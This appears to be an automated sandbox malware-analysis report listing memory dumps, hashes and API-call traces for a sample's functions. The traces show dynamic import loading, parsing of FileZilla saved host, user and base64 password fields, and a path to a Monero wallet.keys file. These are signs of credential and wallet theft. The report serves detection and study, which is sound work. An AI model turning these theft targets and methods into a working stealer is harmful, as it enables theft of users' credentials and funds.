Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 34cdfdabf0c7dcee574f1caa664e21955b0caaf890707170f5c0a7f6ddfbcf5b
Instruction ID: 8777108bf18998cff1506824b63f2da5208ee2aa5b0c4dfaf08d25661a57b6d6
Opcode Fuzzy Hash: 34cdfdabf0c7dcee574f1caa664e21955b0caaf890707170f5c0a7f6ddfbcf5b
Instruction Fuzzy Hash: 88F044B1944648ABC700DFD4DD85BAEBBB8F704711F100159FA15E2780C77425058BA1

Function 008A1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 008A116A
ExitProcess.KERNEL32 ref: 008A117E

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: e5ab345262ca03596d2bbea1648f87e2889ad7293aab8fb259e1c195792ad39d
Instruction ID: dd54886ad99ddc8d94883d237b21920f8e8ff908039e7fbfe7241bbb1b9e7c0f
Opcode Fuzzy Hash: e5ab345262ca03596d2bbea1648f87e2889ad7293aab8fb259e1c195792ad39d
Instruction Fuzzy Hash: 5CD05E7490030CDBCB00DFE0D8896DDBB78FB08312F001554E905A2340EA306482CBA6

Function 008B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01265A10), ref: 008B9C2D
GetProcAddress.KERNEL32(74DD0000,01265A70), ref: 008B9C45
GetProcAddress.KERNEL32(74DD0000,01279620), ref: 008B9C5E
GetProcAddress.KERNEL32(74DD0000,01279560), ref: 008B9C76
GetProcAddress.KERNEL32(74DD0000,01279590), ref: 008B9C8E
GetProcAddress.KERNEL32(74DD0000,012795A8), ref: 008B9CA7
GetProcAddress.KERNEL32(74DD0000,0126BCF0), ref: 008B9CBF
GetProcAddress.KERNEL32(74DD0000,0127CEC0), ref: 008B9CD7
GetProcAddress.KERNEL32(74DD0000,0127CF98), ref: 008B9CF0
GetProcAddress.KERNEL32(74DD0000,0127CE60), ref: 008B9D08
GetProcAddress.KERNEL32(74DD0000,0127D0A0), ref: 008B9D20
GetProcAddress.KERNEL32(74DD0000,01265B70), ref: 008B9D39
GetProcAddress.KERNEL32(74DD0000,01265B90), ref: 008B9D51
GetProcAddress.KERNEL32(74DD0000,01265850), ref: 008B9D69
GetProcAddress.KERNEL32(74DD0000,01265A90), ref: 008B9D82
GetProcAddress.KERNEL32(74DD0000,0127CED8), ref: 008B9D9A
GetProcAddress.KERNEL32(74DD0000,0127CF20), ref: 008B9DB2
GetProcAddress.KERNEL32(74DD0000,0126BD18), ref: 008B9DCB
GetProcAddress.KERNEL32(74DD0000,01265AD0), ref: 008B9DE3
GetProcAddress.KERNEL32(74DD0000,0127D0B8), ref: 008B9DFB
GetProcAddress.KERNEL32(74DD0000,0127CFF8), ref: 008B9E14
GetProcAddress.KERNEL32(74DD0000,0127CF08), ref: 008B9E2C
GetProcAddress.KERNEL32(74DD0000,0127CF68), ref: 008B9E44
GetProcAddress.KERNEL32(74DD0000,01265AF0), ref: 008B9E5D
GetProcAddress.KERNEL32(74DD0000,0127CEF0), ref: 008B9E75
GetProcAddress.KERNEL32(74DD0000,0127CDD0), ref: 008B9E8D
GetProcAddress.KERNEL32(74DD0000,0127CF38), ref: 008B9EA6
GetProcAddress.KERNEL32(74DD0000,0127CE00), ref: 008B9EBE
GetProcAddress.KERNEL32(74DD0000,0127CFC8), ref: 008B9ED6
GetProcAddress.KERNEL32(74DD0000,0127D040), ref: 008B9EEF
GetProcAddress.KERNEL32(74DD0000,0127CE78), ref: 008B9F07
GetProcAddress.KERNEL32(74DD0000,0127D010), ref: 008B9F1F
GetProcAddress.KERNEL32(74DD0000,0127D028), ref: 008B9F38
GetProcAddress.KERNEL32(74DD0000,0127A878), ref: 008B9F50
GetProcAddress.KERNEL32(74DD0000,0127D058), ref: 008B9F68
GetProcAddress.KERNEL32(74DD0000,0127CDE8), ref: 008B9F81
GetProcAddress.KERNEL32(74DD0000,01265B30), ref: 008B9F99
GetProcAddress.KERNEL32(74DD0000,0127D070), ref: 008B9FB1
GetProcAddress.KERNEL32(74DD0000,012655B0), ref: 008B9FCA
GetProcAddress.KERNEL32(74DD0000,0127CE18), ref: 008B9FE2
GetProcAddress.KERNEL32(74DD0000,0127CFB0), ref: 008B9FFA
GetProcAddress.KERNEL32(74DD0000,01265690), ref: 008BA013
GetProcAddress.KERNEL32(74DD0000,01265530), ref: 008BA02B
LoadLibraryA.KERNEL32(0127CF50,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA03D
LoadLibraryA.KERNEL32(0127D088,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA04E
LoadLibraryA.KERNEL32(0127CFE0,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA060
LoadLibraryA.KERNEL32(0127CE30,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA072
LoadLibraryA.KERNEL32(0127CF80,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA083
LoadLibraryA.KERNEL32(0127CE48,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA095
LoadLibraryA.KERNEL32(0127CE90,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA0A7
LoadLibraryA.KERNEL32(0127CEA8,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA0B8
GetProcAddress.KERNEL32(75290000,012655D0), ref: 008BA0DA
GetProcAddress.KERNEL32(75290000,0127D358), ref: 008BA0F2
GetProcAddress.KERNEL32(75290000,01279078), ref: 008BA10A
GetProcAddress.KERNEL32(75290000,0127D118), ref: 008BA123
GetProcAddress.KERNEL32(75290000,01265790), ref: 008BA13B
GetProcAddress.KERNEL32(73440000,0126B700), ref: 008BA160
GetProcAddress.KERNEL32(73440000,01265750), ref: 008BA179
GetProcAddress.KERNEL32(73440000,0126B9D0), ref: 008BA191
GetProcAddress.KERNEL32(73440000,0127D220), ref: 008BA1A9
GetProcAddress.KERNEL32(73440000,0127D298), ref: 008BA1C2
GetProcAddress.KERNEL32(73440000,01265670), ref: 008BA1DA
GetProcAddress.KERNEL32(73440000,012657B0), ref: 008BA1F2
GetProcAddress.KERNEL32(73440000,0127D370), ref: 008BA20B
GetProcAddress.KERNEL32(752C0000,012656F0), ref: 008BA22C
GetProcAddress.KERNEL32(752C0000,01265450), ref: 008BA244
GetProcAddress.KERNEL32(752C0000,0127D388), ref: 008BA25D
GetProcAddress.KERNEL32(752C0000,0127D310), ref: 008BA275
GetProcAddress.KERNEL32(752C0000,01265770), ref: 008BA28D
GetProcAddress.KERNEL32(74EC0000,0126B728), ref: 008BA2B3
GetProcAddress.KERNEL32(74EC0000,0126B7C8), ref: 008BA2CB
GetProcAddress.KERNEL32(74EC0000,0127D100), ref: 008BA2E3
GetProcAddress.KERNEL32(74EC0000,012654D0), ref: 008BA2FC
GetProcAddress.KERNEL32(74EC0000,01265710), ref: 008BA314
GetProcAddress.KERNEL32(74EC0000,0126B9A8), ref: 008BA32C
GetProcAddress.KERNEL32(75BD0000,0127D3A0), ref: 008BA352
GetProcAddress.KERNEL32(75BD0000,01265810), ref: 008BA36A
GetProcAddress.KERNEL32(75BD0000,01279088), ref: 008BA382
GetProcAddress.KERNEL32(75BD0000,0127D208), ref: 008BA39B
GetProcAddress.KERNEL32(75BD0000,0127D1C0), ref: 008BA3B3
GetProcAddress.KERNEL32(75BD0000,012656B0), ref: 008BA3CB
GetProcAddress.KERNEL32(75BD0000,012656D0), ref: 008BA3E4
GetProcAddress.KERNEL32(75BD0000,0127D2F8), ref: 008BA3FC
GetProcAddress.KERNEL32(75BD0000,0127D3B8), ref: 008BA414
GetProcAddress.KERNEL32(75A70000,01265610), ref: 008BA436
GetProcAddress.KERNEL32(75A70000,0127D130), ref: 008BA44E
GetProcAddress.KERNEL32(75A70000,0127D148), ref: 008BA466
GetProcAddress.KERNEL32(75A70000,0127D0D0), ref: 008BA47F
GetProcAddress.KERNEL32(75A70000,0127D178), ref: 008BA497
GetProcAddress.KERNEL32(75450000,01265630), ref: 008BA4B8
GetProcAddress.KERNEL32(75450000,01265570), ref: 008BA4D1
GetProcAddress.KERNEL32(75DA0000,012654B0), ref: 008BA4F2
GetProcAddress.KERNEL32(75DA0000,0127D160), ref: 008BA50A
GetProcAddress.KERNEL32(6F070000,01265730), ref: 008BA530
GetProcAddress.KERNEL32(6F070000,01265650), ref: 008BA548
GetProcAddress.KERNEL32(6F070000,012655F0), ref: 008BA560
GetProcAddress.KERNEL32(6F070000,0127D1F0), ref: 008BA579
GetProcAddress.KERNEL32(6F070000,01265550), ref: 008BA591
GetProcAddress.KERNEL32(6F070000,01265470), ref: 008BA5A9
GetProcAddress.KERNEL32(6F070000,012657D0), ref: 008BA5C2
GetProcAddress.KERNEL32(6F070000,012657F0), ref: 008BA5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 008BA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 008BA607
GetProcAddress.KERNEL32(75AF0000,0127D190), ref: 008BA629
GetProcAddress.KERNEL32(75AF0000,01279098), ref: 008BA641
GetProcAddress.KERNEL32(75AF0000,0127D328), ref: 008BA659
GetProcAddress.KERNEL32(75AF0000,0127D0E8), ref: 008BA672
GetProcAddress.KERNEL32(75D90000,01265830), ref: 008BA693
GetProcAddress.KERNEL32(6CFD0000,0127D238), ref: 008BA6B4
GetProcAddress.KERNEL32(6CFD0000,01265490), ref: 008BA6CD
GetProcAddress.KERNEL32(6CFD0000,0127D340), ref: 008BA6E5
GetProcAddress.KERNEL32(6CFD0000,0127D1A8), ref: 008BA6FD

Strings

HttpQueryInfoA, xrefs: 008BA5FC
InternetSetOptionA, xrefs: 008BA5E5

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 57bf4608da8d93605e2bbcc5b21d75af4a6af3517653e243379657c082bc42e0
Instruction ID: b047b59bb93cd809c30fab4b5c091d8d34b3240aade3b9ba668fb009df45a374
Opcode Fuzzy Hash: 57bf4608da8d93605e2bbcc5b21d75af4a6af3517653e243379657c082bc42e0
Instruction Fuzzy Hash: E5621EBA500280AFC354DFE8EDD89563BF9F76C301715851EA609CB264D639B883DF62

Function 008A7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008A7724
RtlAllocateHeap.NTDLL(00000000), ref: 008A772B
lstrcat.KERNEL32(?,01279CC0), ref: 008A78DB
lstrcat.KERNEL32(?,?), ref: 008A78EF
lstrcat.KERNEL32(?,?), ref: 008A7903
lstrcat.KERNEL32(?,?), ref: 008A7917
lstrcat.KERNEL32(?,0127E350), ref: 008A792B
lstrcat.KERNEL32(?,0127E398), ref: 008A793F
lstrcat.KERNEL32(?,0127E290), ref: 008A7952
lstrcat.KERNEL32(?,0127E1E8), ref: 008A7966
lstrcat.KERNEL32(?,01279D48), ref: 008A797A
lstrcat.KERNEL32(?,?), ref: 008A798E
lstrcat.KERNEL32(?,?), ref: 008A79A2
lstrcat.KERNEL32(?,?), ref: 008A79B6
lstrcat.KERNEL32(?,0127E350), ref: 008A79C9
lstrcat.KERNEL32(?,0127E398), ref: 008A79DD
lstrcat.KERNEL32(?,0127E290), ref: 008A79F1
lstrcat.KERNEL32(?,0127E1E8), ref: 008A7A04
lstrcat.KERNEL32(?,01279DB0), ref: 008A7A18
lstrcat.KERNEL32(?,?), ref: 008A7A2C
lstrcat.KERNEL32(?,?), ref: 008A7A40
lstrcat.KERNEL32(?,?), ref: 008A7A54
lstrcat.KERNEL32(?,0127E350), ref: 008A7A68
lstrcat.KERNEL32(?,0127E398), ref: 008A7A7B
lstrcat.KERNEL32(?,0127E290), ref: 008A7A8F
lstrcat.KERNEL32(?,0127E1E8), ref: 008A7AA3
lstrcat.KERNEL32(?,0127E5B8), ref: 008A7AB6
lstrcat.KERNEL32(?,?), ref: 008A7ACA
lstrcat.KERNEL32(?,?), ref: 008A7ADE
lstrcat.KERNEL32(?,?), ref: 008A7AF2
lstrcat.KERNEL32(?,0127E350), ref: 008A7B06
lstrcat.KERNEL32(?,0127E398), ref: 008A7B1A
lstrcat.KERNEL32(?,0127E290), ref: 008A7B2D
lstrcat.KERNEL32(?,0127E1E8), ref: 008A7B41
lstrcat.KERNEL32(?,0127E620), ref: 008A7B55
lstrcat.KERNEL32(?,?), ref: 008A7B69
lstrcat.KERNEL32(?,?), ref: 008A7B7D
lstrcat.KERNEL32(?,?), ref: 008A7B91
lstrcat.KERNEL32(?,0127E350), ref: 008A7BA4
lstrcat.KERNEL32(?,0127E398), ref: 008A7BB8
lstrcat.KERNEL32(?,0127E290), ref: 008A7BCC
lstrcat.KERNEL32(?,0127E1E8), ref: 008A7BDF
lstrcat.KERNEL32(?,0127E688), ref: 008A7BF3
lstrcat.KERNEL32(?,?), ref: 008A7C07
lstrcat.KERNEL32(?,?), ref: 008A7C1B
lstrcat.KERNEL32(?,?), ref: 008A7C2F
lstrcat.KERNEL32(?,0127E350), ref: 008A7C43
lstrcat.KERNEL32(?,0127E398), ref: 008A7C56
lstrcat.KERNEL32(?,0127E290), ref: 008A7C6A
lstrcat.KERNEL32(?,0127E1E8), ref: 008A7C7E

Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020,008C17FC), ref: 008A7606
Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020,00000000), ref: 008A7648
Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020, : ), ref: 008A765A
Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020,00000000), ref: 008A768F
Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020,008C1804), ref: 008A76A0
Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020,00000000), ref: 008A76D3
Part of subcall function 008A75D0: lstrcat.KERNEL32(2F8AA020,008C1808), ref: 008A76ED
Part of subcall function 008A75D0: task.LIBCPMTD ref: 008A76FB

lstrcat.KERNEL32(?,0127E9D0), ref: 008A7E0B
lstrcat.KERNEL32(?,0127DB18), ref: 008A7E1E
lstrlen.KERNEL32(2F8AA020), ref: 008A7E2B
lstrlen.KERNEL32(2F8AA020), ref: 008A7E3B

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 8b2b8c6273158889ae8a378380def7d4000aa0f8508e68938e9813d9ae0ebeb9
Instruction ID: a71b30bf9572150f88429b0fc892f5c3d0205105ee152314bf7fd084b7593604
Opcode Fuzzy Hash: 8b2b8c6273158889ae8a378380def7d4000aa0f8508e68938e9813d9ae0ebeb9
Instruction Fuzzy Hash: B1323FB6C00354ABDB15EBA0DCC5DEA777CBB54700F044A98F209A6191EE74E78ACF52

Function 008B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A

Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52

GetProcessHeap.KERNEL32(00000000,000F423F,008C0DBA,008C0DB7,008C0DB6,008C0DB3), ref: 008B0362
RtlAllocateHeap.NTDLL(00000000), ref: 008B0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 008B0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 008B03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 008B0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008B0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 008B0562
lstrcat.KERNEL32(?,profile: null), ref: 008B0571
lstrcat.KERNEL32(?,url: ), ref: 008B0580
lstrcat.KERNEL32(?,00000000), ref: 008B0593
lstrcat.KERNEL32(?,008C1678), ref: 008B05A2
lstrcat.KERNEL32(?,00000000), ref: 008B05B5
lstrcat.KERNEL32(?,008C167C), ref: 008B05C4
lstrcat.KERNEL32(?,login: ), ref: 008B05D3
lstrcat.KERNEL32(?,00000000), ref: 008B05E6
lstrcat.KERNEL32(?,008C1688), ref: 008B05F5
lstrcat.KERNEL32(?,password: ), ref: 008B0604
lstrcat.KERNEL32(?,00000000), ref: 008B0617
lstrcat.KERNEL32(?,008C1698), ref: 008B0626
lstrcat.KERNEL32(?,008C169C), ref: 008B0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B068E

Strings

browser: FileZilla, xrefs: 008B0559
login: , xrefs: 008B05CA
password: , xrefs: 008B05FB
<Port>, xrefs: 008B03C6
